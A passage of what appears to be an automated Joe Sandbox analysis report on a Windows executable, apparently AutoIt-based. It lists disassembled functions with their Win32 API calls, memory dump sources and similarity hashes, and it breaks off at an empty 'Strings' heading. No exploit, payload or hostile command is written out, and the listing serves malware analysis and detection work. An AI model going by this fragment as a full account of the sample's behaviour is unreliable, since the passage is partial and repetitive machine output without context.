                                                                                                                                                    • API ID: NameUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                                    • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                                                    • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                                                                    • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                                                    • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                                                                    Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                                    • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                                                                    • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                                    • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                                                                    Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: N@
                                                                                                                                                    • API String ID: 0-1509896676
                                                                                                                                                    • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                    • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                                                    • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                    • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                                                    Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                    • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                                                    • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                    • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                                                    Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                    • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                                                    • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                    • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                                                                    Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                    • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                                                                    • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                    • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                                                                    Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                    • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                                                                    • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                    • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                                                                    Function 02F33630 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2f30000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                    • Instruction ID: ab98bfc9a725683344803f3c6d70b2f06a99590a005810a5e5418ef3522332bf
                                                                                                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                    • Instruction Fuzzy Hash: 9141B571D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB90
                                                                                                                                                    Function 02F334C0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2f30000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                    • Instruction ID: dcbb41363d0c41c27059c7298e3add4564ab73b98e412ce7009fff7cfd8b6400
                                                                                                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                    • Instruction Fuzzy Hash: 7601D279E00109EFCB45DF98C5909AEF7B5FB48310F2085D9D909A7300D730AE41DB80
                                                                                                                                                    Function 02F33520 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2f30000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                    • Instruction ID: 33eba1e6257a5db65adbcaee9e18f252fa2650c8a4ddfad99c8ee7f899a6a285
                                                                                                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                    • Instruction Fuzzy Hash: 7D019279E05109EFCB85DF98C5909AEF7B5FB48350F2085D9D909A7701D730AE41DB80
                                                                                                                                                    Function 02F31E70 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1726754865.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2f30000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                                    Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00459551
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00459563
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00459581
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                                                                    • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                                                                    • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                                                                    • _wcslen.LIBCMT ref: 00459916
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0045993A
                                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                                                                    • GetDC.USER32(00000000), ref: 004599FC
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                                                                    • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                                                                    • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                    • API String ID: 4040870279-2373415609
                                                                                                                                                    • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                    • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                                                    • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                    • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                                                    Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                                                    • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                      • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                      • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                      • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                      • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                      • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                      • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                      • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                      • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 69173610-0
                                                                                                                                                    • Opcode ID: aabc284dba47c1a3a6dec5b78ffd15edee2a2e62f1ca49aa5b34823cb23ab055
                                                                                                                                                    • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                                                    • Opcode Fuzzy Hash: aabc284dba47c1a3a6dec5b78ffd15edee2a2e62f1ca49aa5b34823cb23ab055
                                                                                                                                                    • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                                                    Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                                                    Strings
